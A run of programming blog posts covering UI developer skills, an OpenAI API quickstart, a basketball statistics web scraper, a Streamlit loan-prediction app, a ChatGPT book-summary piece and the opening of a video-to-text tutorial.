🌍 Recommended: Full-Stack Web Developer — Income and Opportunity

Skill 2: JavaScript

JavaScript is a scripting language used to create dynamic and interactive webpages. UI developers need to be proficient in this language to develop modern websites and web applications.

🌍 Recommended: JavaScript Developer — Income and Opportunity

Skill 3: Responsive Design

Responsive design ensures that a website looks and functions great on any device (e.g., mobile devices).

UI developers must be able to create websites that look great on any screen size, from mobile phones to large desktop displays.

🌍 Recommended: Mobile App Developer — Income and Opportunity

Skill 4: Wireframing

Wireframing is the process of creating a blueprint of a website or web application. UI developers need to be able to create wireframes to plan out the structure and layout of a website.

This skill especially requires you to be able to communicate effectively with your clients and project owners.

🌍 Recommended: Get More Clients as a Freelance Developer with This One Simple Trick

Skill 5: User Interface Design

User interface design is the process of creating user-friendly and visually appealing interfaces for websites and web applications.

UI developers need to understand the principles of good design to be able to create interfaces that are both attractive and easy to use.

🌍 Recommended: Less Is More in Design

Skill 6: User Experience Design

User experience design is the process of creating engaging and meaningful experiences for users of websites and web applications.

UI developers need to understand the principles of user experience and dive deep into users’ emotions so they can create enjoyable and fun experiences.

Skill 7: Cross-Browser Compatibility

Cross-browser compatibility is the ability of a website or web application to work properly across multiple types of web browsers.

UI developers need to ensure that their websites and applications look and function properly on all types of browsers.

Skill 8: Version Control

Version control is a system used to track and manage changes to files and documents. UI developers need to be able to use version control to keep track of changes and ensure that their work is up to date.

🌍 Recommended: Git Cheat Sheet [Ultimate Guide]

Skill 9: Debugging

Yes, we all know it and fear it: debugging.

Debugging is the process of finding and fixing errors in a website or web application. UI developers need to be able to debug their code to ensure that their websites and applications are functioning correctly.

🌍 Recommended: Debugging in PyCharm — The Right Way

Skill 10: Testing/QA

Testing and Quality Assurance are processes used to ensure that a website or web application is functioning correctly before it is released. UI developers need to be able to test their work and ensure that it meets the specified requirements.

Testing is often not done correctly or follows too strict rules. In my world, when I create apps, I just play with them, pressing any button and inputting all kinds of stupid things to test my app. This has brought to light many more errors than standard unit tests.

Skill 11: Building User Interfaces with Frameworks

Frameworks are used to simplify the process of building user interfaces. UI developers need to be familiar with the most popular frameworks in order to create modern and efficient user interfaces.

Here’s a table I created to show the income distributions of different PHP frameworks:

🌍 Recommended: 8 PHP Frameworks That Make You Money as a Web Developer in 2023

Skill 12: Accessibility and Usability

Accessibility and usability are two important aspects of user interface design. In fact, there’s a huge megatrend towards creating more accessible user interfaces — often, they are legally required!

It’s a big growth market — unbelievable, isn’t it? 😉

UI developers need to be able to design interfaces that are both accessible and usable to provide the best user experience.

Skill 13: Interaction Design

Interaction design is the process of creating user interactions that are both intuitive and efficient. UI developers need to be able to create interactions that are easy to use and don’t require a lot of effort from the user.

Skill 14: Web Design Principles

Web design principles are the fundamental rules that should be followed when designing websites and web applications. UI developers need to understand these principles to create attractive and effective interfaces.

🌍 Recommended: 7 Tips to Write Clean Code


The Art of Clean Code

Most software developers waste thousands of hours working with overly complex code. The eight core principles in The Art of Clean Coding will teach you how to write clear, maintainable code without compromising functionality. The book’s guiding principle is simplicity: reduce and simplify, then reinvest energy in the important parts to save you countless hours and ease the often onerous task of code maintenance.

  1. Concentrate on the important stuff with the 80/20 principle — focus on the 20% of your code that matters most
  2. Avoid coding in isolation: create a minimum viable product to get early feedback
  3. Write code cleanly and simply to eliminate clutter 
  4. Avoid premature optimization that risks over-complicating code 
  5. Balance your goals, capacity, and feedback to achieve the productive state of Flow
  6. Apply the Do One Thing Well philosophy to vastly improve functionality
  7. Design efficient user interfaces with the Less is More principle
  8. Tie your new skills together into one unifying principle: Focus

The Python-based The Art of Clean Coding is suitable for programmers at any level, with ideas presented in a language-agnostic manner.


Skill 15: Graphic Design

Graphic design is the process of creating visuals and graphics for websites and web applications. UI developers need to be able to create attractive visuals to make their websites look appealing.

🌍 Recommended: Graphic Designer and Front-End Web Developer

Skill 16: Object-Oriented Programming

Object-oriented programming is a programming paradigm used to create complex websites and web applications. UI developers must understand this programming paradigm to create efficient and powerful web applications.

🌍 Recommended: Object-Oriented Programming in Python

Skill 17: Animation and Effects

Animations and effects are used to create dynamic and engaging user interfaces. UI developers need to be able to create animations and effects to make their websites more attractive and engaging.

Skill 18: Mobile App Design

Mobile app design is the process of designing user interfaces for mobile applications. UI developers need to understand the principles of mobile app design in order to create engaging and user-friendly apps.

🌍 Recommended: Top 6 Mobile App Development Career Paths in 2023

Skill 19: Front-End Performance Optimization

Front-end performance optimization is the process of optimizing a website or web application to make it faster and more efficient. UI developers must understand optimization principles to create fast and efficient websites and web applications.

🌍 Recommended: Premature Optimization is the Root of All Evil!

Skill 20: Data Visualization

Data visualization is the process of creating visuals that represent data in an easy-to-understand way. UI developers need to be able to create effective data visualizations to make complex data easier to understand.

Personally, I’d recommend you check out Plotly Dash — a Python framework for easy development of dashboard apps:

🌍 Recommended: Create Your First App in Plotly Dash

Learn More


If you’re interested in learning more about how to create beautiful dashboard applications in Python, check out our new book Python Dash.

You’ve seen dashboards before; think election result visualizations you can update in real-time, or population maps you can filter by demographic.

With the Python Dash library, you’ll create analytic dashboards that present data in effective, usable, elegant ways in just a few lines of code.

Get the book on NoStarch or Amazon!


Posted on Leave a comment

OpenAI API – or How I Made My Python Code Intelligent

5/5 – (1 vote)

In this quick tutorial, I’ll show you how I integrated ChatGPT intelligence into an app I’m currently working on. It’s really simple, so let’s get started!

Step 1: Create a Paid Account with OpenAI

I’m not affiliated with OpenAI in any way. However, to use it, you need to create a (paid) account to create an API key that you’ll need in order to connect ChatGPT with your code.

👉 Click here to create an account and connect it with your credit card

I use it a lot and pay only a couple of cents per day so it’s really inexpensive for now.

Step 2: Get Your API Key

Open the link https://beta.openai.com/playground and navigate to Personal > View API keys.

Now, click the + Create new secret key button to create a new API key:

Now copy the API key to your clipboard:

Step 3: Pip Install OpenAI

Use your version of pip to install the openai module by running a command similar to the following (depending on your local environment):

  • pip install openai
  • pip3 install openai
  • pip3.11 install openai

As I’ve installed Python 3.9 at the point of writing, I used pip3.9 install openai:

You can check your Python version here and learn how to install a module here.

Step 4: Python Code to Access OpenAI

Copy and paste the following code into a Python script (e.g., named code.py) and also paste your API key from Step 2 into the highlighted line (string):

import os
import openai openai.api_key = "<copy your secret API key here>" response = openai.Completion.create( model="text-davinci-003", prompt="What is the answer to all questions?", temperature=0.7, max_tokens=100, top_p=1, frequency_penalty=0, presence_penalty=0
) print(response)

You can modify the other highlighted line "What is the answer to all questions?" to customize your input prompt. The output after a few seconds will look like this:

{ "choices": [ { "finish_reason": "stop", "index": 0, "logprobs": null,
 "text": "\n\nThere is no one answer to all questions as each question has its own unique answer." } ], "created": 1674579571, "id": "cmpl-6cGvr0TM2PGsExeyG3NEx43CrNwSx", "model": "text-davinci-003", "object": "text_completion", "usage": { "completion_tokens": 19, "prompt_tokens": 8, "total_tokens": 27 }
}

Unfortunately, it couldn’t figure out the answer 42. 😉

Posted on Leave a comment

Basketball Statistics – Page Scraping Using Python and BeautifulSoup

5/5 – (1 vote)

In this blog series, powerful Python libraries are leveraged to help uncover some hidden statistical truths in basketball. The first step in any data-driven approach is to identify and collect the data needed.

Luckily for us, Basketball-Reference.com hosts pages of basketball data that can be easily scraped. The processes of this walkthrough can be easily applied to any number of their pages, but for this case, we plan on scraping seasonal statistics of multiple rookie classes.

Project Overview

The Objectives:

  1. Identify the Data Source
  2. Download the Page
  3. Identify Important Page Elements
  4. Pre-Clean and Extract
  5. Archive

The Tools:

  • Requests
  • Beautiful Soup
  • Pandas

Though we will inevitably be working with many specialized libraries throughout this project, the above packages will suffice for now.

Identifying the Data Source

Basketball-Reference.com hosts hundreds of curated pages on basketball statistics that range from seasonal averages of typical box score categories like points, rebounds, and shooting percentages, all the way down to the play-by-play action of each game played in the last 20 or so years. One can easily lose their way in this statistical tsunami if there isn’t a clear goal set on what exactly to look for.

The goal here in this post is simple: get rookie data that will help in assessing a young player’s true value and potential.

The following link is one such page. It lists all the relevant statistics of rookies in a particular season.

👉 Link: https://www.basketball-reference.com/leagues/NBA_1990_rookies-season-stats.html

In order to accumulate enough data to make solid statistical inferences on players, one year of data won’t cut it. There need to be dozens of years’ worth of data collected to help filter through the noise and come to a conclusion on a player’s future potential.

If an action can be manually repeated, it makes itself a great candidate for automation. In this case, the number in the URL above corresponds to the respective year of that rookie class. Powered by that knowledge, let’s start putting together our first lines of code.

import requests
import pandas as pd
from bs4 import BeautifulSoup years = list(range(1990, 2017)) url_base = "https://www.basketball-reference.com/leagues/NBA_{}_rookies-season-stats.html"

In creating the two variables referenced above, our thought process is as follows.

  1. The appropriate packages are imported
  2. url_base serves to store the pre-formatted string variable of the target URL
  3. The years list variable specifies the ranged of the desired years, 1990 up to 2017

Downloading the Page Data

In scraping web pages, it’s imperative to remove as much overhead as possible. Seeing as the site stores all their information on the HTML front end, the page can be easily downloaded and locally stored in its entirety.

# iterates through each year and downloads page into an HTML file
for year in years: url = url_base.format(year) data = requests.get(url) # page is save as an html and placed in Rookies folder with open("notebooks/Rookies/{}.html".format(year), "w+") as f: f.write(data.text)

The for loop iterates through the list variable years.

The curly braces found within the url’s string will serve to allow the format to substitute it with the currently iterated year.

For example, in its first iteration, the url value will be 'https://www.basketball-reference.com/leagues/NBA_1990_rookies-season-stats.html'.

On its second iteration, the subsequent year would be referenced instead (https://www.basketball-reference.com/leagues/NBA_1991_rookies-season-stats.html)

The data variable acts as a placeholder for the requests.get() function and references of the currently iterated url string value.

The requests method then uses the newly formatted URL string to retrieve the page in question.

The subsequent with open() reads and writes (w+) the page data from our requests.get (data.text), and locally stores the newly created HTML files.

Why download the page and store it locally?

To avoid a common growing pain in site scraping, we store these pages as local HTML files.

See, when making a visit to a page site, the server hosting said page has to honor your request and send back the appropriate data to your browser. But having one specific client asking for the same information over and over puts undue strain on the server.

The server admin is well within their rights to block these persistent requests for the sake of being able to optimally provide this service to others online.

By downloading these HTML files on your local machine, you avoid two things:

  1. Having to wait longer than usual to collect the same data
  2. Being blocked from visiting the page, halting data collection altogether

Identifying Important Page Elements

To scrape data elements of these recently downloaded pages using Python, there needs to be a means to understand what properties these HTML elements have. In order to identify these properties, we need to inspect the page itself.

How to Inspect

We’ll need to dive deeper into the inner workings of this document, but I promise I won’t make this an exercise on learning HTML.

If you know how to inspect HTML objects, feel free to jump ahead. Otherwise, please follow along on how to inspect page elements.

Option 1: Developer Tools

  1. Click on the three vertical dots on Chrome’s top menu bar
  2. Choose “More tools”
  3. Select Developer tools.

Option 2: Menu Select

  1. Right-click on the web page
  2. Choose “Inspect” to access the Developer tools panel

Inspecting the Page

Seeing that all of these pages are locally stored, we can choose to view them by either going into the file system to open them in our desired browser, or, we can continue to build our code by implementing the following snippet of code.

with open("notebooks/Rookies/2000.html") as f: page = f.read()

Below is the loaded page with Developer Tools docked to the right. Notice how hovering the mouse cursor on the HTML line containing the class ID rookies highlights the table element on the page?

All the desired data of this page is housed in that table element. Before hastily sucking up all of this data as is, now is the best time to consider whether everything on this table is worth collecting.

Pre-Clean

Pre-cleaning might not be a frequent word in your vocabulary, but for those of you seeing yourself scraping data regularly, it should be. If you want to avoid the frustration of wasted hours of progress on a data collection project, it’s best to first separate the chaff from the wheat.

For instance, take note of the three elements boxed in red.

One row serves as the “main” table header. The other two rows are duplicate instances of the same artifacts found at the top. This pattern repeats every 20th row.

Upon further inspection of these elements, it’s revealed that all of these rows have the same tr (table row) HTML tag. What distinguishes each of these elements from any others are their class names.

  1. Main Header Row
    a. Class = over_header
  2. Repeat Header Rows
    a. Class = over_header thead
  3. Statistics Category Row
    a. Class = thead
# array to house list of dataframes
dfs = [] # unnecessary table rows to be removed
classes = ["over_header", "over_header thead", "thead"]
  1. dfs will be used later on to house several data frames
  2. The classes array object will hold all the unwanted table row element’s class names.

Knowing that these elements provide no statistical value, rather than simply “skipping over” them in our parse, they should instead be completely omitted. That’s to say, permanently removed from any future considerations.

The decompose method serves to remove unwanted elements in a page. As per the official Beautiful Soup page.

decompose()

Tag.decompose() removes a tag from the tree, then completely destroys it and its contents.

Below is a snippet of code where the decompose method is optimized using multiple for loops.

# for loop to iterate through the years for year in years: with open("notebooks/Rookies/{}.html".format(year)) as f: page = f.read() soup = BeautifulSoup(page, "html.parser") # for loop cleans up unnecessary table # headers from reappearing in rows for i in classes: for tr in soup.find_all("tr", {"class":i}): tr.decompose()
  1. First for loop is used to iterate through the values of our years list object
  2. The with method provides our code the structure for the page variable to read locally stored HTML files when called on
  3. An HTML parser class is initialized by instantiating the BeautifulSoup class and passing in both the page string object and html.parser.
  4. Second for loop iterates through the values in the classes array
  5. Third for loop utilizes Beautiful Soup’s find_all method to identify elements that have both tr tags and class names matching those in classes
  6. tr.decompose serves to omit each of the identified table row elements from the page entirely

Let’s look to build on this by extracting the data we do want.

Extracting the Data

We can finally start working on the part of the code that actually extracts data from the table.

Remember that the table in with all of the relevant data has the HTML unique ID rookies. The following additions to our code will serve to parse the data of this table.

# the years we wish to parse for
years = list(range(1990, 2017)) # array to house list of dataframes
dfs = [] # unnecessary table headers to be removed
classes = ["over_header","over_header thead", "thead"] for year in years: with open("notebooks/Rookies/{}.html".format(year)) as f: page = f.read() soup = BeautifulSoup(page, "html.parser") #for loop cleans up unnecessary table headers from reappearing in rows for i in classes: for tr in soup.find_all("tr", {"class":i}): tr.decompose() ### Start Scraping Block ### #identifies, scrapes, and loads rookie tables into one dataframe rookie_table = soup.find(id="rookies") rookies = pd.read_html(str(rookie_table))[0] rookies["Year"] = year dfs.append(rookies) # new variable turns list of dataframes into single dataframe
all_rookies = pd.concat(dfs)

For what follows ### Start Scraping Block ###

  1. The rookie_table variable serves to help identify this, and only this table on the page
  2. Seeing that the Pandas package can read HTML tables, the rookie table is loaded into Pandas using the read_html method, passing the  rookie_table as a string
  3. Tacking on to end [0] to turn it from a list of dataframes into a single dataframe
  4. A “Year” column is added to the rookies dataframe
  5. dfs.append(rookies) serves to house all of tables of every rookie year in the order they were iterated into a list of dataframes
  6. The Pandas method concat is used to combine that list of dataframes into one single dataframe: all_rookies

Archiving

Our final step involves taking all of this useful, clean information and archiving it in easily readable CSV format. Tacking on this line to the end of our code (outside of any loops!) will serve to be useful when deciding to come back and reference the data collected.

# dataframe archived as local CSV
all_rookies.to_csv("archive/NBA_Rookies_1990-2016.csv")

Final Product

import requests
import pandas as pd
from bs4 import BeautifulSoup # the years we wish to parse for
years = list(range(1990, 2017)) # array to house list of dataframes
dfs = [] # unnecessary table headers to be removed
classes = ["over_header","over_header thead", "thead"] # loop iterates through years
for year in years: with open("notebooks/Rookies/{}.html".format(year)) as f: page = f.read() soup = BeautifulSoup(page, "html.parser") #second for loop clears unnecessary table headers for i in classes: for tr in soup.find_all("tr", {"class":i}): tr.decompose() # identifies, scrapes, and loads rookie tables into one dataframe table_rookies = soup.find(id="rookies") rookies = pd.read_html(str(table_rookies))[0] rookies["Year"] = year dfs.append(rookies) #new variable turns list of dataframes into single dataframe
all_rookies = pd.concat(dfs) #dataframe archived as local CSV
all_rookies.to_csv("archive/NBA_Rookies_1990-2016.csv")

Closing

Again, the process followed in this walkthrough will undoubtedly apply to most every other page on Basketball-Reference.com.

There are five simple steps worth taking in each instance.

  1. Identify the Page URL
  2. Download the Page
  3. Identify the Elements
  4. Pre-Clean and Extract
  5. Archive

Following these five steps will help guarantee a quick and successful scraping experience.

Next up in this series will be actually using this data to gain insight into future player potential. So be on the lookout for future installments!

We’ll share them here:

Posted on Leave a comment

How I Built and Deployed a Python Loan Eligibility Prediction App on Streamlit

4.5/5 – (2 votes)

In this tutorial, I will walk you through a machine-learning project on Loan Eligibility Prediction with Python. Specifically, I will show you how to create and deploy machine learning web applications using Streamlit.

Streamlit makes it easy for data scientists with little or no knowledge of web development to develop and deploy machine learning apps quickly. Its compatibility with data science libraries makes it an excellent choice for data scientists looking to deploy their applications.

👉 You can try the live demo app here:

Prerequisites

Although I will try my best to explain some concepts and the steps I took in this project, I assumed you already have a basic knowledge of Python and its application in machine learning.

For Streamlit, I will only explain the concepts that have a bearing on this project. If you want to know more, you can check the documentation.

Loan Eligibility Prediction

Banks and other financial institutions give out loans to people. But before they approve the loan, they have to make sure the applicant is eligible to receive the loan. There are many factors to consider before deciding whether or not the applicant is eligible for the loan. Such factors are but not limited to credit history and the applicant’s income.

To automate the loan approval process, banks and other financial institutions require the applicant to fill in a form in which some personal information will be gathered. These include gender, education, credit history, and so on. An applicant’s loan request will either be approved or rejected based on such information.

In this project, we are going to build a Streamlit dashboard where our users will fill in their details and check if they are eligible for a loan or not. This is a classification problem. Hence, we will use machine learning with Python and a dataset containing information on customers’ past transactions to solve the problem. So, let’s get started.

The Dataset

Let’s load our dataset using the Pandas library.

import pandas as pd
data = pd.read_csv('LoanApprovalPrediction.csv')
data.shape
# (598, 13)

Our dataset contains 598 rows and 13 columns. Using the .info() method, we can get more information about the dataset.

data.info()

We can see all the columns that make up the dataset. If you view the first five rows using data.head(), you will notice that some columns are categorical but their datatypes are shown as object. More on this soon. Let’s check if there are missing values.

data.isna().sum()

Output:

Loan_ID 0
Gender 0
Married 0
Dependents 12
Education 0
Self_Employed 0
ApplicantIncome 0
CoapplicantIncome 0
LoanAmount 21
Loan_Amount_Term 14
Credit_History 49
Property_Area 0
Loan_Status 0
dtype: int64

Wow! Our dataset contains lots of missing values. We have a lot of data cleaning to do. Finally, let’s check if our Loan_ID contains duplicates.

data.Loan_ID.nunique()
# 598

Loan_ID has the exact number of rows. No duplicates. So, we can safely drop it as it will not be used for training.

# Dropping Loan_ID column
data.drop(['Loan_ID'], axis=1, inplace=True)

By setting the inplace parameter to True, we want the change to be directly applied to our dataset. The axis=1 parameter corresponds to the column side. It’s now time to clean and prepare our dataset for training.

Data Cleaning and Preparation

Seeing that our dataset contains many missing values, we have several options to choose from. It is either we drop the missing rows or we fill them up with a given value. To determine which action to take, let’s first check the total number of missing values.

data.isna().sum().sum()
# 96

The dataset contains 96 missing values representing 16% of our dataset, a not-so-insignificant number indeed. I choose to fill them up instead of dropping them. Let’s fill them up with the mean value of their respective columns.

Oh! We can’t fill in a number in a categorical column. So, we will first convert the categorical columns to int datatype.

For this, we can choose to use Pandas’ map function or use LabelEncoder from the Scikit-learn library.

If we use the Pandas’ map function, we will repeat the same process for every categorical column. If you are like me and don’t like constant repetition (DRY), you will choose the second option.

This, though, does not rule out the importance of Pandas’ map function. Therefore, to show its importance and to add to your knowledge, let me show you how to apply it to our dataset.

data.Gender = data.Gender.map({'Male': 0, 'Female':1})

With that, the Gender column gets converted to int datatype. You will have to do it to all the columns involved. But since we are changing all our categorical columns to a binary number, we have to follow the easy way using LabelEncoder.

from sklearn.preprocessing import LabelEncoder
label_encoder = LabelEncoder()
obj = (data.dtypes == 'object')
for col in list(obj[obj].index): data[col] = label_encoder.fit_transform(data[col])

We want to select only the columns with the datatype as object. We started by creating a Boolean in line 12 which returns True to object datatypes. Then in line 13, we perform what we call a Boolean mask. This filters out only the columns with the object datatype and transforms them to a binary number in each iteration.

You can confirm it using the .info() method and you will see that all our categorical columns have been converted to int datatype. Having done that, we can now fill in the missing values.

for col in data.columns: data[col] = data[col].fillna(data[col].mean())

We fill in the missing rows with the mean value of their respective columns. Again, you can confirm it by typing data.isnull().sum() or data.isna().sum().

Model Training

It’s now time to train our data using selected models. We will first divide our model into two: features (x) and target (y) variables.

x = data.drop(['Loan_Status'], axis=1)
y = data.Loan_Status

For each variable, we divide further into two for training and testing the model using train_test_split from Scikit-Learn.

from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=7)

We reserved 30% of our dataset for testing the model. By setting a random_state to a given number, we ensure we get the same set of data whenever the code is run. It’s now time to select a model.

We don’t know what algorithm or model will do well on our dataset. For this reason, we will test our data with different models and select the model with the highest accuracy score.

from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import RidgeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
form sklearn.ensembles import RandomForestClassifier models = []
models.append(('LR', LogisticRegression(max_iter=1000)))
models.append(('LDA', LinearDiscriminantAnalysis()))
models.append(('KNN', KNeighborsClassifier()))
models.append(('CART', DecisionTreeClassifier()))
models.append(('NB', GaussianNB()))
models.append((‘SVC’, SVC()))
models.append(('RC', RidgeClassifier()))
models.append(('RF', RandomForestClassifier())) def modeling(model): model.fit(x_train, y_train) y_pred = model.predict(x_test) return accuracy_score(y_test, y_pred) * 100 for name, model in models: print(f'{name} = {modeling(model)}') LR = 80.83333333333333
LDA = 82.5
KNN = 63.74999999999999
CART = 68.33333333333333
NB = 81.66666666666667
SVC = 69.16666666666667
RC = 82.91666666666667
RF = 81.66666666666667

The result shows that Ridge Classifier performs more than the models, followed by Linear Discriminant Analysis with only a slight difference. Both could benefit from further study.

However, we will use the Ridge Classifier algorithm.

Here is the full code. Save the model as model.py:

import pandas as pd
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.linear_model import RidgeClassifier
from sklearn.metrics import accuracy_score
import pickle # load the data
data = pd.read_csv('LoanApprovalPrediction.csv')
# Drop Loan_ID column
data.drop(['Loan_ID'], axis=1, inplace=True)
# convert to int datatype
label_encoder = LabelEncoder()
obj = (data.dtypes == 'object')
for col in list(obj[obj].index): data[col] = label_encoder.fit_transform(data[col]) # fill in missing rows
for col in data.columns: data[col] = data[col].fillna(data[col].mean())
# divide model into features and target variable
x = data.drop(['Loan_Status'], axis=1)
y = data.Loan_Status # divide into training and testing data
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=7)
# define the model
model = RidgeClassifier()
# fit the model on the training data
model.fit(x_train, y_train)
#save the train model
with open('train_model.pkl', mode='wb') as pkl: pickle.dump(model, pkl)

By saving our model in a pickle file, it can easily be called to make predictions, thus saving ourselves the time of waiting for the model to get trained each time it’s run.

Preparing Streamlit Dashboard

Now that we are done with training our model. Let’s prepare the Streamlit interface. We will start by defining our main function. Since we also want it to run when we open the Streamlit app, we will call it using the __name__ variable. Save this script with the name app.py:

import streamlit as st def main(): bg = """<div style='background-color:black; padding:13px'> <h1 style='color:white'>Streamlit Loan Elgibility Prediction App</h1> </div>""" st.markdown(bg, unsafe_allow_html=True) left, right = st.columns((2,2)) gender = left.selectbox('Gender', ('Male', 'Female')) married = right.selectbox('Married', ('Yes', 'No')) dependent = left.selectbox('Dependents', ('None', 'One', 'Two', 'Three')) education = right.selectbox('Education', ('Graduate', 'Not Graduate')) self_employed = left.selectbox('Self-Employed', ('Yes', 'No')) applicant_income = right.number_input('Applicant Income') coApplicantIncome = left.number_input('Coapplicant Income') loanAmount = right.number_input('Loan Amount') loan_amount_term = left.number_input('Loan Tenor (in months)') creditHistory = right.number_input('Credit History', 0.0, 1.0) propertyArea = st.selectbox('Property Area', ('Semiurban', 'Urban', 'Rural')) button = st.button('Predict') # if button is clicked if button: # make prediction result = predict(gender, married, dependent, education, self_employed, applicant_income, coApplicantIncome, loanAmount, loan_amount_term, creditHistory, propertyArea) st.success(f'You are {result} for the loan')

We imported the Streamlit library. Then, we added color using HTML tags and since Python does not recognize such, we used the parameter unsafe_allow_html to make it to be recognized, without which the black color will not appear.

We displayed several text boxes, and select boxes to get data from our users which will, in turn, be used to make predictions.

Notice that we used the exact data found in the datasets including their features. Since we have already transformed the categorical columns to int datatypes, you may have to reload the dataset and use the .value_counts() method on each column to see the features.

Let’s now define our predict() function.

# load the train model
with open('train_model.pkl', 'rb') as pkl: train_model = pickle.load(pkl) def predict(gender, married, dependent, education, self_employed, applicant_income, coApplicantIncome, loanAmount, loan_amount_term, creditHistory, propertyArea): # processing user input gen = 0 if gender == 'Male' else 1 mar = 0 if married == 'Yes' else 1 dep = float(0 if dependent == 'None' else 1 if dependent == 'One' else 2 if dependent == 'Two' else 3) edu = 0 if education == 'Graduate' else 1 sem = 0 if self_employed == 'Yes' else 1 pro = 0 if propertyArea == 'Semiurban' else 1 if propertyArea == 'Urban' else 2 Lam = loanAmount / 1000 cap = coApplicantIncome / 1000 # making predictions prediction = train_model.predict([[gen, mar, dep, edu, sem, applicant_income, coApplicantIncome, Lam, loan_amount_term, creditHistory, pro]]) verdict = 'Not Eligible' if prediction == 0 else 'Eligible' return verdict

The predict() function has all the features of our dataset. Then, we used a ternary operator to change the user input into a number. Notice that we converted the dep variable to a float. We did all these things to ensure they correspond to the datatype in our datasets.

Also, we made sure that the order in which we placed our parameters both at the beginning and end of the function corresponds with the one in the main() function. Anything contrary will either lead to an error or poor prediction.

Why did we divide the loanAmount and coApplicantIncome by 1,000? Well, I will leave that to you to answer. Just to give you a little hint, type this, data.loanAmount.describe(), and see if you can figure it out yourself.

Conclusion

This is how we come to the end of this tutorial.

You have learned how to apply machine learning to a classification problem such as loan prediction.

You also learned how to create an interactive dashboard using Streamlit. Now, to deploy it on Streamlit Cloud so that others can use it, sign up on Streamlit and GitHub if you haven’t done so.

Check my GitHub page for the full code. Create a repository and deploy it to Streamlit Cloud. You can view my live demo app here. In a future article, I will show you how to use machine learning to solve a regression problem. Alright, have a nice day.

Posted on Leave a comment

Reading 365 Books in 365 Days Possible? Yes, with ChatGPT!

4/5 – (1 vote)

It’s no surprise that many of us are looking for ways to increase our productivity. After all, an increase in productivity can mean an increase in our income and a better quality of life.

  • For example, if you’re a freelance developer earning $40,000 per year and you increase the number of clients you serve by 2x and the value per client by 2x, your income can easily jump to $240,000, adding an additional 25% premium for quality, a very realistic assumption.
  • Or say you’re the owner of a fast-growing startup, and you boost your productivity to achieve an additional +15% growth per year. For a company with $200,000 in sales, $150,000 in net profit, and a valuation of $800,000, the additional growth means a nice little bonus of $800,000 in exit value!

But how can we achieve such a lofty goal of boosting your productivity?

Enter ChatGPT, the revolutionary new artificial intelligence technology that can help us increase our productivity by 10x to 100x. And now, a new idea has emerged for how we can use ChatGPT to rapidly increase our personal growth: speed reading books.

Made by DALL.E

Warren Buffett famously said, “knowledge compounds.” The idea is that if we can improve our skills by just 1% each day, we can increase our skills by 36x in a year.

But how can we actually achieve this?

One of the most potent ways is to simply become a much more effective person by consuming massive amounts of high-quality information related to your area of expertise. Warren Buffett fills his extremely valuable time with reading for more than 5 hours every day. Most other billionnaires share his habit of reading tons of books in their areas of interest.

Books are full of knowledge, but they are not filled with shallow distractions and low-quality or misleading content found on social media. Following top-level research papers, books are the highest-quality sources of information, followed by “B-level” research papers, blogs, news sites, forums, and social networks.

Made by DALL.E

Average Information Quality (Ranking):

  1. ⭐ A-level research papers
  2. ⭐ Books
  3. ⭐ Quality blogs
  4. ❌ News sites
  5. ❌ Forums
  6. ❌ Social networks

By focusing our information consumption on the top three sources, we can expect to see a dramatic increase in our knowledge. ChatGPT helps us to accomplish this by allowing us to read condensed versions of quality books in mere minutes. With ChatGPT, we can theoretically read 365 books in 365 days!

An intelligent chat bot could help you understand the main points of non-fiction books by summarizing the content of the book.

In fact, I did it to help me understand the main points of a lengthy 1200 pages non-fiction book “Atlas Shrugged”:

🌍 Recommended: Atlas Shrugged 1200 Pages in 5 Minutes

The chat bot uses natural language processing and machine learning algorithms to scan the text and extract key concepts and ideas. The chat bot could then generate a summary of the book and present it to you in a conversational format, allowing you to interact with it and ask it questions.

This helps you quickly get an overview of the main points of the book so you can decide whether or not you want to read it in more depth.

You can ask it all kinds of questions to dive deeper into various aspects of the book. You can even ask it to generate a series of questions to ask about the book — and ask it those questions right afterwards! 🤯

Imagine the possibilities if we could rapidly increase our knowledge by reading more quality books! We could become much more effective and efficient human beings and experience a leap in productivity.

These productivity levels are now within our reach, thanks to the powerful technology of ChatGPT. Reading 365 books in 365 days is now a reality, and with it comes the potential for rapid personal growth.

🌍 Recommended: 16 Best Ideas on How Early Adopters Use ChatGPT to Get More Done in 2023

Posted on Leave a comment

Python Video to Text – Speech Recognition

5/5 – (1 vote)

A good friend and his wife recently founded an AI startup in the lifestyle niche that uses machine learning to discover specific real-world patterns from videos.

For their business system, they need a pipeline that takes a video file, converts it to audio, and transcribes the audio to standard text that is then used for further processing. I couldn’t help but work on a basic solution to help fix their business problem.

Project Overview

I finished the project in three steps:

  • First, install the necessary libraries.
  • Second, convert the video to an audio file (.mp4 to .wav)
  • Third, convert the audio file to a speech file (.wav to .txt). We first break the large audio file into smaller chunks and convert each of them separately due to the size restrictions of the used API.

Let’s get started!

Step 1: Install Libraries

We need the following import statements in our code:

# Import libraries
import speech_recognition as sr
import os
from pydub import AudioSegment
from pydub.silence import split_on_silence
import moviepy.editor as mp

Consequently, you need to pip install the following three libraries in your shell — assuming you run Python version 3.9:

pip3.9 install pydub
pip3.9 install SpeechRecognition
pip3.9 install moviepy

The os module is already preinstalled as a Python Standard Library.

If you need an additional guide on how to install Python libraries, check out this tutorial:

👉 Recommended: Python Install Library Guide

Step 2: Video to Audio

Before you can do speech recognition on the video, we need to extract the audio as a .wav file using the moviepy.editor.VideoFileClip().audio.write_audiofile() method.

Here’s the code:

def video_to_audio(in_path, out_path): """Convert video file to audio file""" video = mp.VideoFileClip(in_path) video.audio.write_audiofile(out_path)

👉 Recommended: Python Video to Audio

Step 3: Audio to Text

After extracting the audio file, we can start transcribing the speech from the .wav file using Google’s powerful speech recognition library on chunks of the potentially large audio file.

Using chunks instead of passing the whole audio file avoids an error for large audio files — Google has some restrictions on the audio file size.

However, you can play around with the splitting thresholds of 700ms silence—it can be more or less, depending on your concrete file.

Here’s the audio to text code function that worked for me:

